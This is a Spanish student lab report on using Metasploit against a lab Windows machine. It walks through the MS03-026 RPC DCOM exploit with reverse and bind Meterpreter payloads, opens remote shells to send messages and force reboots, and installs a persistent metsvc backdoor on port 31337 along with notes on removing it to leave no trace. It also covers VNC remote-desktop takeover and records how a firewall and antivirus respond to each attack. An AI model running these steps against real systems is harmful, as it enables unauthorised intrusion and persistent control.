Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
RECOPILACION DE INFORMACIN
METASPLOIT BSICO.
SEGUNDO DE ASIR
Pgina 1
En el instalaremos metasploit, lo descargamos de la pgina principal y bajaremos la versin correspondiente a nuestro sistema operativo http://www.metasploit.com/download/ Una vez descargado, seguimos los pasos de la instalacin por defecto se instalar en C:/METASPLOIT, para qu queremos saber esto? Lo mejor en la instalacin es desactivar nuestro antivirus y una vez terminada aadir esa carpeta a las excepciones del mismo.
SEGUNDO DE ASIR
Pgina 2
En el Equipo vctima tenemos instalado o instalaremos antes de empezar aunque no es estrictamente necesario ni IIS ni SQL SERVER al menos con los exploit que utilizaremos en esta prctica. IIS COMO SERVIDOR WEB SQLSERVER 2005 FIREWALL WINDOWS ANTIVIRUS NOD32 actual a da de hoy 17 de enero de 2012, de hecho segn muchos el mejor antivirus que hay y segn otros uno de los ms potentes con karpersky, Mcafee y BitDefender, G-DATA Para instalar el antivirus seguimos los siguientes pasos, nosotros instalaremos una versin de prueba, lo primero la descargamos y elegimos la versin de nuestro sistema operativo http://www.eset.eu/download/eset-smart-security-trial Una vez descargada seguimos los pasos que vienen a continuacin le damos a siguiente, versin de prueba, insertamos nuestro correo y recibiremos la contrasea por email.
SEGUNDO DE ASIR
Pgina 3
Aqu vemos que ya tenemos nuestra contrasea, es decir, que la hemos recibido y tan solo la tendramos que introducir y el antivirus queda activado con todas sus caractersticas durante los treinta das siguientes de recibir el e-mail.
SEGUNDO DE ASIR
Pgina 4
RECOPILACION DE INFORMACIN
Lo primero que vamos a hacer antes de empezar con los ataques va a ser ejecutar el modo grafico para hacer un anlisis de vulnerabilidades y una deteccin del sistema operativo, puertos abiertos
Una vez finalizado el anlisis podemos ver como ha sido detectado el nombre del equipo y el sistema operativo.
SEGUNDO DE ASIR
Pgina 5
SEGUNDO DE ASIR
Pgina 6
1. CONCEPTOS BASICOS.
Para empezar a hablar del metasploit, lo definiremos como una herramienta GNU escrita en perl y con utilizacin de diversos lenguajes de programacin como C, Python,ASM ,etc, para el desarrollo, testeo, mejora y penetracin a diversos sistemas, entre ellos Windows. Metasploit se ejecuta bajo una consola CYGWIN y trabaja con una base de datos en la cual se encuentran toda la lista de exploits y vulnerabilidades, lo nico que tenemos que indicarle a metasploit es que vulnerabilidad utilizaremos, que sistema atacaremos, que tipo de ataque utilizaremos y datos diversos que utilizara para atacar al host. Se llama Metasploit Framework porque es todo un entorno de testeo para diversas plataformas, la cual trabaja con libreras, bases de datos, y diversos programas, shellcodes, etc. Por tal deja de ser un simple software si no un framework. Metasploit Puede ser descargado de: http://www.metasploit.com/
SEGUNDO DE ASIR
Pgina 7
Modo Consola: El modo de consola de metasploit aunque es un poco ms engorroso trabajar con l, suele funcionar de una manera ms rpida y a veces mejor, para ejecutarlo, tienes que ejecutar el archivo msfconsole.bat de la carpeta de metasploit. E ir trabajando por medio de comandos en lugar de una interface:
SEGUNDO DE ASIR
Pgina 8
El comando seria: use msrpc_dcom_ms03_026 Con este comando le diremos a metasploit que utilizaremos el exploit Microsoft RPC DCOM.
SEGUNDO DE ASIR
Pgina 9
Para seleccionar la opcion adecuada utilizaremos el comando SET, el cual su estructura es as: set [Variable] [Valor] Entonces para seleccionar una opcin el comando debera quedar de la siguiente manera set TARGET 0 Aqu por ejemplo le estamos diciendo a metasploit que la variable target es igual a 0 (donde 0 es windows NT SP3) es necesario que las variables de metasploit vaya en MAYUSCULAS ya que si no lo haces as en algunas te dar error. Hasta ahora con lo que hemos hecho lo nico que le hemos ordenado a metasploit es que exploit utilizaremos y que sistema operativo es el que va a atacar, ahora si se dan cuenta falta indicarle que tipo de ataque utilizaremos, para ver los ataques soportados por este exploit utilizaremos el comando show payloads Lo cual nos mostrara una lista como la siguiente:
SEGUNDO DE ASIR
Pgina 10
Bien una vez que queramos seleccionar un mtodo de ataque utilizaremos el mismo comando SET [Variable] [Valor] en este caso ser: set PAYLOAD win32_reverse_vncinject Con esto le diremos a metasploit que utilizaremos el meotod win32_reverse_vncinject (recuerda que las variables van en mayusculas). Despus de hacer metasploit necesita mas datos dependiendo del tipo de ataque, exploit o target que utilizaras, para ver opciones te pide utilizaremos el comando show options
SEGUNDO DE ASIR
Pgina 11
4. ACTUALIZACION Como metasploit utiliza una base de datos donde tiene guardada toda la informacion (targets, exploits, etc) es recomendable actualizara, esto lo pueden hacer ejecutando el archivo msfupdate.bat una vez ejecutado empezara a buscar actualizaciones y si hay te preguntara si quieres descargarlas
SEGUNDO DE ASIR
Pgina 12
SEGUNDO DE ASIR
Pgina 14
SEGUNDO DE ASIR
Pgina 15
PAYLOAD WINDOWS/METERPRETER/REVERSE_TCP
Ahora vamos a utilizar una ataque reverse_tcp el cual nos va a conseguir en principio una sesin meterpreter
Vemos con show options los requerimientos necesarios para la ejecucin de este exploit y si son requeridos.
Entonces ahora lo que hacemos es seleccionar el host local que va a ser el atacante Set lhost 192.168.1.36 Tambien la direccin ip de el equipo al que vamos a atacar Set rhost 192.168.1.35 Y seguidamente lanzamos el exploit escribiendo exploit
SEGUNDO DE ASIR
Pgina 16
COMPORTAMIENTO DEL EXPLOIT CON FIREWALL Y ANTIVIRUS NOD32 5.0.9.5 Como podemos ver el exploit se ejecuta correctamente y creamos la sesin si ningn problema.
ATAQUE: ENVIANDO UN MENSAJE VIA MS-DOS Una vez creada la sesin abrimos una Shell, con el comando Shell Escribimos el comando netstart mensajero Y despus escribimos el siguiente comando " net send xxx.xxx.x.x mensaje sin las comillas donde estn las equis ser la direccin ip de la victima y evidentemente, donde pone mensaje, el mensaje que estamos mandando. Como podemos ver en la imagen y hemos indicado el firewall y el antivirus estn completamente en funcionamiento.
SEGUNDO DE ASIR
Pgina 17
ATAQUE: REINICIANDO LA MAQUINA DE FORMA REMOTA Ejecutamos el comando Shell para abrir una consola de forma inversa
Y escribimos el comando siguiente en el que indicamos que el equipo atacado se reinicie enviando un mensaje y mostrndolo durante 60 segundos que es el tiempo en el que se va a apagar el sistema
Como podemos ver se nos muestra el mensaje correspondiente que hemos indicado
SEGUNDO DE ASIR
Pgina 18
PAYLOAD WINDOWS/METERPRETER/BIND_TCP
ATAQUE: PUERTA TRASERA O BACKDOOR set payload windows/meterpreter/bind_tcp
Una vez que hemos escogido el payload, lo primero que miramos con show options es los requisitos de dicho payload y nos cercioramos de que cumplimos todos y configuramos todo debidamente para que funcione la direccin del host local y la del remoto como hemos hecho en el ejemplo anterior si es que estamos en una sesin diferente o hemos empezado a trabajar con esta la primera.
COMPORTAMIENTO DEL EXPLOIT CON FIREWALL DE WINDOWS ACTIVADO Podemos ver que intenta crear la sesin, pero el tiempo de conexin queda excedido y la direccin bloqueada.
COMPORTAMIENTO DEL EXPLOIT CON FIREWALL Y ANTIVIRUS NOD32 5.0.9.5 Vemos que aqu es capaz de detectar el sistema operativo y atacar dicha vulnerabilidad una vez que ha seleccionado la TARGET correctamente, pero no es capaz de iniciar sesin, con lo cual no podemos continuar
SEGUNDO DE ASIR
Pgina 19
Entonces ahora lo que vamos a hacer es crear una puerta trasera o (backdoor) para poder acceder al sistema siempre que queramos. Ejecutamos el comando run metsvc y creamos dicho servicio en el pueto 31337 como se nos indica en la maquina. Una vez completado todo el proceso ya tendramos la puerta trasera funcionando para entrar en el sistema a nuestro antojo.
UNA VEZ QUE TENEMOS UNA PUERTA TRASERA EN EL SISTEMA ABIERTA NI EL FIREWALL DE WINDOWS NI EL ANTIVIRUS Y FIREWAL DE NOD 32 5.0.95 IMPIDEN QUE INICIEMOS SESION Siempre que quisiramos acceder al sistema segaramos los siguientes pasos Ejecutamos el siguiente comando desde la consola de metaspoit use exploit/multi/handler
SEGUNDO DE ASIR
Pgina 20
Entonces se lo indicamos con el comando lport y el nmero del proceso, en este caso seria lport 31337
Si esto fuera una nueva sesin en la que no tuviramos indicada la ip de nuestra victima, lo haramos como en la siguiente imagen.
Y ya solo nos quedara lanzar el exploit y ver como accedemos a una sesin en nuestra vctima.
SEGUNDO DE ASIR
Pgina 21
Si queremos desinstalar el metsvc en el host remoto para no dejar rastro, tan slo tenemos que ejecutar metsvc -r en nuestra sesin de meterpreter.
SEGUNDO DE ASIR
Pgina 22
PAYLOAD WINDOWS/VNCINJECT/BIND_TCP
ATAQUE: ESCRITORIO REMOTO
Con show options miramos las opciones que nos son requeridas tanto del exploit como del payload elegido
COMPORTAMIENTO DEL EXPLOIT CON FIREWALL DE WINDOWS ACTIVADO Ejecutamos el payload y vemos que no nos crea la conexin porque el tiempo supera el lmite excedido.
COMPORTAMIENTO DEL EXPLOIT CON FIREWALL Y ANTIVIRUS NOD32 5.0.9.5 Aqu vemos que la sesin de Fingerprinting, se hace correctamente, pero que pese a que el exploit se completa, la sesin no se crea.
SEGUNDO DE ASIR
Pgina 23
SEGUNDO DE ASIR
Pgina 24
COMPORTAMIENTO DEL EXPLOIT CON FIREWALL Y ANTIVIRUS NOD32 5.0.9.5 Vemos como se crea perfectamente la sesin
Y accedemos como vemos al escritorio remoto en el que vemos lo que ya sabamos que tanto el FIREWALL como el antivirus estn en activo, y pasaramos a controlar de forma remota el equipo.
SEGUNDO DE ASIR
Pgina 25